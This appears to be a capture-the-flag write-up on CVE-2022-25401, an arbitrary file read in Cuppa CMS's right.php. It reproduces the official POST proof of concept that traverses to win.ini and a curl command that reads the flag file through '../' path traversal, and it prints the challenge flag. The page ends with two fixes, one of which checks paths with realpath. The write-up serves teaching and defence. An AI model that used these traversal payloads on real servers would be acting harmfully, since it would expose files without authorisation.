Spring Cloud Environment: CVE-2022-25401 (arbitrary file read vulnerability)

Table of contents

1. Topic

2. curl access to the flag file


1. Topic

Introduction:

There is an arbitrary file read vulnerability in the Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php file.

Opening the challenge shows a login page.

Neither SQL injection nor brute force leads anywhere.

Official POC

National Information Security Vulnerability Database

CVE vulnerability description

The directory in the official POC is wrong for this target: there is no administrator/ directory here, so the file cannot be found at that path.

Official POC (code block):

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

Intercepted and modified the request in Burp, but it was unsuccessful; it may be a directory problem.

2. curl access to the flag file

Browse to templates/default/html/windows/right.php

A blank page here means the file exists; if it did not exist, the server would return 404.

Browse to the templates/default/html directory

right.php in the windows directory

View the source code:

Use curl from Kali to request the flag file in the root directory

curl is a command-line tool that issues network requests, retrieves the response data, and writes it to standard output (stdout). It supports a variety of protocols and can be used to view the source of a web page: append the URL to the curl command and the page source is printed.

curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"

Get the flag:

flag{fa417734-dac9-4947-831f-67b3ed302120} 

Attached:

Vulnerability repair suggestion
In the '/templates/default/html/windows/right.php' file, at line 53, add the following code (the original page lost the underscores of __DIR__ in the include line; restored here):

// Take the template path from the POST body as before.
$url = $_POST["url"];
// Reject any path that tries to climb out of the template directory.
if(strstr($url, "../") || strstr($url, "..\\")){
    echo "Security attack!";
    exit;
}
// Include relative to the application root, never an arbitrary location.
include realpath(__DIR__ . '/../../../..')."/".$url;
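The substring check above stops the plain "../" form, but a sturdier fix is to resolve the final path with realpath() and verify that it lies inside the allowed base directory, so that canonicalisation, not string matching, decides. The following is an added example written for this page; it is not Cuppa CMS code, and the function name resolve_template_path, the base directory layout and the allowed extensions are assumptions:

```php
<?php
// Added example (not Cuppa CMS code): resolve a user-supplied template path and
// refuse anything whose canonical form escapes the allowed base directory.
// realpath() containment replaces substring checks, so odd encodings of ".."
// are handled by the filesystem's own normalisation rather than by guesswork.

function resolve_template_path(string $base, string $url): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                       // misconfigured base directory
    }
    // Null bytes can truncate the path in lower layers; refuse them outright.
    if (strpos($url, "\0") !== false) {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $url);
    if ($candidate === false) {
        return null;                       // file does not exist
    }
    // The resolved path must lie strictly inside the base directory.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // traversal: resolved outside base
    }
    // Only template files may be included, never arbitrary readable files
    // (assumption: templates are .php or .html).
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ['php', 'html'], true)) {
        return null;
    }
    return $candidate;
}

// Self-check on a constructed temporary layout (assumption: run from the CLI).
if (PHP_SAPI === 'cli') {
    $tmp    = sys_get_temp_dir();
    $base   = $tmp . '/templates_' . bin2hex(random_bytes(4));
    $secret = $tmp . '/secret_' . bin2hex(random_bytes(4)) . '.txt';
    mkdir($base . '/html/windows', 0700, true);
    file_put_contents($base . '/html/windows/right.php', "<?php // constructed template\n");
    file_put_contents($secret, "constructed secret, must never be returned\n");

    $ok       = resolve_template_path($base, 'html/windows/right.php');
    $climb    = resolve_template_path($base, '../' . basename($secret));
    $climbTwo = resolve_template_path($base, 'html/../../' . basename($secret));
    echo 'legitimate template : ', $ok !== null ? 'allowed' : 'blocked', "\n";
    echo 'plain traversal     : ', $climb === null ? 'blocked' : 'ALLOWED', "\n";
    echo 'nested traversal    : ', $climbTwo === null ? 'blocked' : 'ALLOWED', "\n";

    unlink($secret);
    unlink($base . '/html/windows/right.php');
    rmdir($base . '/html/windows');
    rmdir($base . '/html');
    rmdir($base);
}
```

In right.php the call site would then read `$path = resolve_template_path(__DIR__ . '/../../../..', $_POST['url'] ?? ''); if ($path === null) { http_response_code(400); exit; } include $path;`. Returning null for both a non-existent file and a blocked traversal also removes the blank-page-versus-404 difference that the writeup used to confirm the file's existence.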


Origin: blog.csdn.net/m0_65712192/article/details/130306670